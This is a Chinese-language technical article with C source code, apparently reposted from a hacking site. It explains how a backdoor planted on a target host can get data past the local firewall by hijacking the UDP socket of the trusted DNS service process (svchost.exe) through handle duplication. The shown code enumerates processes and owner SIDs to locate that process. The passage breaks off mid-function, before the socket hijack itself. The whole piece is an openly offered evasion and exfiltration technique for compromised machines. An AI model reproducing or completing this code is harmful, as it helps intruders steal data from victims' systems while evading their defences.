穿透防火墙的数据传输方法

2008-04-02 10:57:55来源：互联网阅读 ()

通常，在我们为目标主机安放好了后门需要将数据传输出去时，主机上的防火墙都会让我们遇到一些不大不小的麻烦。如果为我们自己的进程开一个端口（甚至是新建套接字），那么大部分的防火墙都会将其拦截。有什么方法能“穿透”这些防火墙呢？

下面我为您介绍一种“洞穿”防火墙小规模传输重要数据的方法。不过，不推荐您在其它情况下使用该方法。

其实我的思路很简单，既然防火墙会拦截未验证进程而放行已验证进程的数据传输，那我们就将其它进程中允许数据传输的套接字句柄拿为已用。具体过程如下：

1、找出目标进程；

2、找出SOCKET句柄；

2、用DuplicateHandle()函数将其SOCKET转换为能被自己使用；

3、用转换后的SOCKET进行数据传输。

上面的过程写的很简单，但是实现起来还存在一些问题（后面再做讨论）。另外，从上面的实现方法中也可以看到一些很难控制的地方，比如在目标进程的SOCKET不能是TCP，只能是UDP，因为TCP的句柄已经跟外面建立了连接。同时，针对不同系统不同进程我们也很难定位一个稳定的进程SOCKET。

看到这么多“麻烦”，你有点泄气了对不对？不要着急，再想一想，其实我们有一条真正通向罗马的“黄金大道”。我们都知道只要一台计算机联上了网络，那么有一种数据传输是肯定不会被拦截的，不错，就是DNS！你能想像域名解析数据都被拦截所造成的后果吗？既然DNS是不会被拦的，而且它又是UDP传输，我们就从它“开刀”。

本文为您提供了一个通过直接控制DNS进程（其实也就是svchost.exe，不过对应用户名是NETWORK SERVICE）进行数据传输的例子。

查看详细源代码。
源代码部分：
/*

Made By ZwelL
zwell@sohu.com
2005.4.12
--*/

#include <winsock2.h>
#include <stdio.h>
#include <wtsapi32.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status) ((NTSTATUS)(status)>=0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )
{
BOOL ret = FALSE;
char NTDLL_DLL[] = "ntdll.dll";
HMODULE ntdll_dll = NULL;

if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )
{
printf( "GetModuleHandle() failed");
return( FALSE );
}
if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )
{
goto LocateNtdllEntry_exit;
}
ret = TRUE;

LocateNtdllEntry_exit:

if ( FALSE == ret )
{
printf( "GetProcAddress() failed");
}
ntdll_dll = NULL;
return( ret );
}

/*
This routine is used to get a process's username from it's SID
--*/
BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)
{
// sanity checks and default value
if (pUserSid == NULL)
return false;
strcpy(szUserName, "?");

SID_NAME_USE snu;
TCHAR szUser[_MAX_PATH];
DWORD chUser = _MAX_PATH;
PDWORD pcchUser = &chUser;
TCHAR szDomain[_MAX_PATH];
DWORD chDomain = _MAX_PATH;
PDWORD pcchDomain = &chDomain;

// Retrieve user name and domain name based on user's SID.
if (
::LookupAccountSid(
NULL,
pUserSid,
szUser,
pcchUser,
szDomain,
pcchDomain,
&snu
)
)
{
wsprintf(szUserName, "%s", szUser);
}
else
{
return false;
}

return true;
}

/*

This routine is used to get the DNS process's Id

Here, I use WTSEnumerateProcesses to get process user Sid,
and then get the process user name. Beacause as it's a "NETWORK SERVICE",
we cann't use OpenProcessToken to catch the DNS process's token information,
even if we has the privilege in catching the SYSTEM's.

--*/
DWORD GetDNSProcessId()
{
PWTS_PROCESS_INFO pProcessInfo = NULL;
DWORD ProcessCount = 0;
char szUserName[255];
DWORD Id = -1;

if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))
{
// dump each process description
for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess )
{

if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )
{
GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);